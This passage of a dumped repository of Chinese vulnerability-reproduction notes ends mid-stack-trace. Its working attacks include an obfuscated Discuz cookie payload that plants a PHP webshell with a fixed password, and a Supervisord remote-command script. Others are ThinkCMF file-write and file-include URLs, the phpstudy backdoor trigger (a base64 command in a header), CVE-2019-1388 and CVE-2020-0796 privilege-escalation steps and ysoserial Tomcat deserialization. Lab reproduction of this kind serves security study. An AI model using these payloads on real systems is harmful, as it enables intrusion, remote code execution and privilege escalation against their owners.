http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 59 | Connection: close 60 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 61 | Upgrade-Insecure-Requests: 1 62 | Pragma: 
no-cache 63 | Cache-Control: no-cache 64 | ``` 65 | 然后可使用蚁剑连接,地址http://172.16.35.128:8080/wf.php 密码lalala 66 | 67 | # 0x06 踩坑记录 68 | 无 69 | 70 | # 0x07 参考链接 71 | 无 72 | -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/0.png -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import xmlrpc.client 3 | import sys 4 | 5 | 6 | target = sys.argv[1] 7 | command = sys.argv[2] 8 | with xmlrpc.client.ServerProxy(target) as proxy: 9 | old = getattr(proxy, 'supervisor.readLog')(0,0) 10 | 11 | logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() 12 | getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile)) 13 | result = getattr(proxy, 'supervisor.readLog')(0,0) 14 | 15 | print(result[len(old):]) 16 | -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Supervisord:一款python实现的进程管理程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:kali_x64_en-us 10 | 11 | cd vulhub/supervisor/CVE-2017-11610 12 | docker-compose up -d 13 | 14 | # 0x03 利用条件 15 | 无 16 | 17 | # 0x04 影响版本 18 | Supervisor 3.3.2 (2017-06-03) 19 | Supervisor 3.3.1 (2016-08-02) 20 | Supervisor 3.3.0 (2016-05-14) 21 | Supervisor 3.2.3 (2016-03-19) 22 | Supervisor 3.2.2 (2016-03-04) 23 | Supervisor 3.2.1 (2016-02-06) 24 | 
Supervisor 3.2.0 (2015-11-30) 25 | Supervisor 3.1.3 (2014-10-28) 26 | Supervisor 3.1.2 (2014-09-07) 27 | 28 | # 0x05 漏洞复现 29 | 攻击环境:kali_x64_en-us 30 | 31 | python3 ./poc.py "http://172.17.0.1:9001/RPC2" "id" 32 | 如下图 33 | ![image](./0.png) 34 | 35 | # 0x06 踩坑记录 36 | 无 37 | 38 | # 0x07 参考链接 39 | 无 40 | -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/ThinkCMFX_2.2.3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/ThinkCMFX_2.2.3.zip -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | 基于ThinkPHP 3.2.3,让开发者更方便的一款开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:ThinkCMF X2.2.3 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:win10_1909_pro_x64_zh-chs 10 | 11 | 下载ThinkCMF X2.2.3,直接放到phpstudy的目录下,访问/ThinkCMFX/,根据提示操作即可 12 | 13 | # 0x03 利用条件 14 | 无 15 | 16 | # 0x04 影响版本 17 | ThinkCMF X1.6.0 18 | ThinkCMF X2.1.0 19 | ThinkCMF X2.2.0 20 | ThinkCMF X2.2.1 21 | ThinkCMF X2.2.2 22 | ThinkCMF X2.2.3 23 | 24 | # 0x05 漏洞复现 25 | 
攻击环境:win10_1909_pro_x64_zh-chs(在英文的kali系统下访问会提示“just a demo for multi lang user! LANG IS en-us;”) 26 | 27 | 任意文件写入漏洞复现: 28 | 浏览器下访问 29 | ``` 30 | ?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','') 31 | ``` 32 | 访问test.php,可以看到phpinfo已经加载出来 33 | ![image](./0.png) 34 | 35 | 任意文件包含漏洞复现: 36 | 浏览器访问 37 | ``` 38 | ?a=display&templateFile=README.md 39 | ``` 40 | 可以看到成功包含了README.md 41 | ![image](./1.png) 42 | 43 | # 0x06 踩坑记录 44 | 坑1: 45 | 搭建环境时,第三步报错,提示“thinkcmf 安装报错 Driver.class.php  LINE: 350”,执行“drop database thinkcmf”后,重新安装成功,原因未知 46 | 47 | # 0x07 参考链接 48 | 无 49 | -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/0.png -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/cve-2020-0796-local提权工具.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/cve-2020-0796-local提权工具.exe -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | SMB:Windows下常用的文件共享的协议 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:windows 10 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Windows  10 Version 1903 for 32-bit Systems 16 | Windows  10 Version 1903 for ARM64-based Systems 17 | Windows  10 Version 1903 for x64-based Systems 18 | Windows  10 Version 1909 for 32-bit Systems 19 | 
Windows  10 Version 1909 for ARM64-based Systems 20 | Windows  10 Version 1909 for x64-based Systems 21 | Windows  Server, version 1903 (Server Core installation) 22 | Windows  Server, version 1909 (Server Core installation) 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:windows 10 26 | 27 | 执行“cve-2020-0796-local提权工具.exe”后,会以管理员权限弹出命令提示符窗口,如下图 28 | ![image](./0.png) 29 | 30 | # 0x06 踩坑记录 31 | 坑1: 32 | 复现失败原因:可能禁用了SMB 3.1的压缩功能 33 | 解决办法(启用SMB 3.1的压缩功能): 34 | 以管理员方式运行 Powershell,执行如下命令: 35 | ``` 36 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force 37 | ``` 38 | -Value的值改为1则禁用SMB压缩;禁用压缩正是该漏洞在安装补丁之前的临时缓解措施,复现完成后应改回1 39 | 40 | # 0x07 参考链接 41 | 无 42 | -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/0.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/1.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/2.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/3.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/3.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/4.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/5.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/6.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/hhupd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/hhupd.exe -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | UAC:Windows下一款权限控制程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:Windows 7 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:Windows 7 专业版 版本 6.1(内部版本 7601:Service Pack 1) 10 | 11 | # 
0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | 服务器版本: 16 | Windows 2008r2 7601 17 | Windows 2012r2 9600 18 | Windows 2016 14393 19 | Windows 2019 17763 20 | PC版本: 21 | Windows 7 SP1 7601 22 | Windows 8 9200 23 | Windows 8.1 9600 24 | Windows 10 1511 10240 25 | Windows 10 1607 14393 26 | Windows 10 1703 15063 27 | Windows 10 1709 16299 28 | 29 | # 0x05 漏洞复现 30 | 攻击环境:Windows 7 专业版 版本 6.1(内部版本 7601:Service Pack 1) 31 | 32 | 创建用户wql(普通用户权限),使用账号wql登入系统,win+r输入cmd,键入命令whoami,结果如下 33 | ![image](./0.png) 34 | 使用管理员权限打开工具hhupd.exe,点击显示详细信息,按图示点击 35 | ![image](./2.png) 36 | ![image](./3.png) 37 | 关闭窗口,这时候浏览器会打开之前点击的链接,(必须要关闭窗口,不然不会显示的),在浏览器中点击页面,另存为,如下 38 | ![image](./4.png) 39 | 选择C:\Windows\System32\cmd ,如下 40 | ![image](./5.png) 41 | 回车之后就会弹出一个命令提示符窗口,输入命令:whoami,成功提权,结果如下 42 | ![image](./6.png) 43 | 44 | # 0x06 踩坑记录 45 | 坑1: 46 | 有的复现帖子上说win10 1903和win7都可以,但是实测win 10 1903 (OS 内部版本18362.778)与win7 (7600)均复现失败。 47 | 48 | # 0x07 参考链接 49 | 无 50 | -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_phpstudy后门漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_phpstudy后门漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | phpstudy:流行的php集成部署环境 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:phpstudy 2018 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 后门代码存在于phpstudy 2016和phpstudy 
2018自带的php-5.2.17、php-5.4.45中的\ext\php_xmlrpc.dll模块中,用记事本打开此文件,查找“@eval”,若文件存在“@eval(%s('%s'));”则存在后门,如下图 12 | ![image](./0.png) 13 | 下载并安装phpstudy 2018,按照提示下一步即可 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | phpstudy 2016和phpstudy 2018自带的php-5.2.17、php-5.4.45 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | burp抓包,请求头中添加字段:Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 25 | 上述字符串是“echo system("net user");”base64编码后的字符串,结果如下图 26 | ![image](./1.png) 27 | 需要注意,发送的数据包头部中的Accept-Encoding:gzip, deflate有一处问题,deflate与前面的逗号之间有一个空格,需要手动删除,不然无法成功执行命令 28 | 29 | # 0x06 踩坑记录 30 | 无 31 | 32 | # 0x07 参考链接 33 | 无 34 | 35 | # 注意 36 | 我当时寻找有漏洞的版本花了好多时间,现将我寻找到的有效版本分享给大家,漏洞环境大于25MB,不能上传到github中,使用百度云分享 37 | phpstudy2016分享,提取码:ybdt,链接:https://pan.baidu.com/s/1-dX55n6xT5hNcBYkxicOBg 38 | phpstudy2018分享,提取码:ybdt,链接:https://pan.baidu.com/s/1bLX53txLZx4NQAwTsM4BQA 39 | -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/GitHack-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/GitHack-master.zip -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/readme.md: 
-------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | git:分布式版本控制系统 3 | 4 | # 0x01 复现环境 5 | 使用环境:攻防世界中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | 无 16 | 17 | # 0x05 漏洞复现 18 | 攻击环境:kali_x64_en-us 19 | 20 | git clone https://github.com/lijiejie/GitHack 21 | cd ./GitHack-master 22 | python ./GitHack.py http://124.126.19.106:31232/.git/ 23 | 如下图 24 | ![image](./0.png) 25 | ![image](./1.png) 26 | 27 | # 0x06 踩坑记录 28 | 无 29 | 30 | # 0x07 参考链接 31 | 无 32 | -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a0.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a1.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a2.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a3.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a3.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a4.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:Apache Tomcat 8.0.36 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:win7_ult_x64_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.0.36.zip 12 | 下载并安装jdk-7u79-windows-x64.exe 13 | 配置环境变量JAVA_HOME(这里有一点需要注意:配置环境变量JAVA_HOME前也可在cmd.exe下执行“java.exe -version”,原因是jdk安装完毕后会自动将java.exe及相关文件拷贝到c:\windows\system32\下) 14 | 在conf/server.xml中添加以下语句 15 | ``` 16 | 17 | ``` 18 | ![image](./a0.png) 19 | 然后下载catalina-jmx-remote.jar包和groovy-2.3.9.jar包,放到tomcat的lib目录下 20 | 注意: 21 | 1、下载的catalina-jmx-remote.jar要与对应tomcat版本一致,一般这个jar在官方tomcat下载目录的extras文件夹里 22 | 2、下载groovy,版本最好为2.3.9,官网已经不提供下载了,附上下载地址:https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9 23 | 接着修改bin/catalina.bat,在Execute The Requested Command上面添加 24 | ``` 25 | set CATALINA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false 26 | ``` 27 | -Dcom.sun.management.jmxremote.ssl=false 指定是否使用SSL通讯 28 | -Dcom.sun.management.jmxremote.authenticate=false 指定是否需要密码验证 29 | ![image](./a1.png) 30 | 最后运行bin/startup.bat启动tomcat! 
31 | ![image](./a2.png) 32 | 查看目标是否启动了JmxRemoteLifecycleListener,即是否监听端口10001,10002,经查看,已启动 33 | ![image](./a3.png) 34 | 35 | # 0x03 利用条件 36 | 目标启动了JmxRemoteLifecycleListener,即监听了端口10001、10002 37 | 38 | # 0x04 影响版本 39 | Apache Tomcat 9.0.0.M1 to 9.0.0.M11 40 | Apache Tomcat 8.5.0 to 8.5.6 41 | Apache Tomcat 8.0.0.RC1 to 8.0.38 42 | Apache Tomcat 7.0.0 to 7.0.72 43 | Apache Tomcat 6.0.0 to 6.0.47 44 | 45 | # 0x05 漏洞复现 46 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 47 | 48 | 下载ysoserial,执行 49 | ``` 50 | java -cp ./ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.149.134 10001 Groovy1 calc.exe 51 | ``` 52 | 可以看到靶机上弹出了计算器 53 | ![image](./a4.png) 54 | 55 | # 0x06 踩坑记录 56 | 坑1: 57 | tomcat版本相同,在java 1.8.0_131下无法弹出计算器。推测这个漏洞的利用还和java版本、groovy版本有关 58 | 坑2: 59 | 利用成功,ysoserial输出如下 60 | ``` 61 | Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true 62 | WARNING: An illegal reflective access operation has occurred 63 | WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/root/Desktop/ysoserial-master-6eca5bc740-1.jar) to method java.lang.Object.finalize() 64 | WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1 65 | WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations 66 | WARNING: All illegal access operations will be denied in a future release 67 | java.lang.ClassCastException: java.lang.ProcessImpl cannot be cast to java.util.Set 68 | at com.sun.proxy.$Proxy9.entrySet(Unknown Source) 69 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443) 70 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 71 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 72 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 73 | at 
java.lang.reflect.Method.invoke(Method.java:606) 74 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 75 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 76 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 77 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 78 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 79 | at java.util.HashMap.readObject(HashMap.java:1180) 80 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 81 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 82 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 83 | at java.lang.reflect.Method.invoke(Method.java:606) 84 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 85 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 86 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 87 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 88 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 89 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 90 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 91 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 92 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 93 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 94 | at java.lang.reflect.Method.invoke(Method.java:606) 95 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 96 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 97 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 98 | at 
java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 99 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 100 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 101 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 102 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 103 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 104 | at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source) 105 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409) 106 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 107 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 108 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 109 | at java.security.AccessController.doPrivileged(Native Method) 110 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 111 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 112 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 113 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 114 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 115 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 116 | at java.security.AccessController.doPrivileged(Native Method) 117 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 118 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 119 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 120 | at java.lang.Thread.run(Thread.java:745) 121 | at java.rmi/sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:303) 122 | at java.rmi/sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:279) 123 | at 
java.rmi/sun.rmi.server.UnicastRef.invoke(UnicastRef.java:380) 124 | at java.rmi/sun.rmi.registry.RegistryImpl_Stub.bind(RegistryImpl_Stub.java:73) 125 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:77) 126 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:71) 127 | at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecCheckingSecurityManager.java:72) 128 | at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:71) 129 | at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:65) 130 | ``` 131 | 利用失败,ysoserial输出如下 132 | ``` 133 | $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.228.152 10001 Groovy1 calc.exe 134 | java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 135 | java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 136 | java.lang.ClassNotFoundException: org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 137 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:419) 138 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 139 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 140 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 141 | at java.security.AccessController.doPrivileged(Native Method) 142 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 143 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 144 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 145 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 146 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 147 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 148 | at java.security.AccessController.doPrivileged(Native Method) 149 | at 
sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 150 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 151 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 152 | at java.lang.Thread.run(Thread.java:745) 153 | at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(Unknown Source) 154 | at sun.rmi.transport.StreamRemoteCall.executeCall(Unknown Source) 155 | at sun.rmi.server.UnicastRef.invoke(Unknown Source) 156 | at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source) 157 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:44) 158 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:38) 159 | at ysoserial.secmgr.ExecCheckingSecurityManager.wrap(ExecCheckingSecurityManager.java:72) 160 | at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:38) 161 | at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32) 162 | Caused by: java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 163 | java.lang.ClassNotFoundException: 